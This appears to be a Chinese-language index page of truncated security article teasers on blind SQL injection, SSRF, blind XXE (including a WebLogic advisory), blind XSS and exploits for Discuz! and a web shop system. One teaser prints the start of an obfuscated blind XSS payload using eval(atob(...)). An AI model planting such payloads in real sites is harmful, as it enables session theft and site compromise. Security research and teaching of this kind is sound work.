声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。背景介绍:通过向朋友发送视频时使用的文本,...
漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-II
漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-II声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法...
Blind (Time Based ) SQL payloads list
原文始发于微信公众号(Khan安全攻防实验室):Blind (Time Based ) SQL payloads list
我是如何挖到三个SSRF并赚到250美元赏金的
微信公众号:渊龙Sec安全团队为国之安全而奋斗,为信息安全而发声!如有问题或建议,请在公众号后台留言如果你觉得本文对你有帮助,欢迎在文章底部赞赏我们0# 前言这是HackerOne上的一个私人项目25...
【高危安全预警】WebLogic Blind XXE漏洞
↑ 点击上方“安全狗”关注我们2019年4月17日,Oracle官方发布4月份安全补丁, 补丁中包含WebLogic Blind XXE漏洞,漏洞编号为CVE-2019-2647。利用该漏洞,攻击者可...
Blind XSS
Payload:"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...
gitlab漏洞系列-由外部授权所导致的blind SSRF
背景复现步骤问题所在gitlab漏洞系列-由外部授权所导致的blind SSRF 声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部...
关于Blind XXE
开篇 关于XXE,很早之前内部做过分享,个人觉得漏洞本身没太多的玩点,比较有意思主要在于:不同语言处理URI的多元化和不同XML解析器在解析XML的一些特性。在科普Blind XXE之前,假定你们已经...
《SSRF检测的一些思考》
SSRF检测的一些思考前些时日看到有大哥分享了一个检测SSRF的nuclei模板:Blind-SSRF[1],刚好咱最近在学习nuclei,所以直接用它的模板...
渗透测试|利用Blind XXE Getshell(Java网站)
目录Blind XXE读取任意文件Getshell这是一道类似CTF的题目。话不多说访问链接,如下。于是随便输入任意数字,点击Create Account抓包重放,发现是XML提交的格式。于是乎想到了...
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit
9959 网店系统 v5.0 Blind SQL injection exploit
作者:闷豆、 以下是引用片段:
3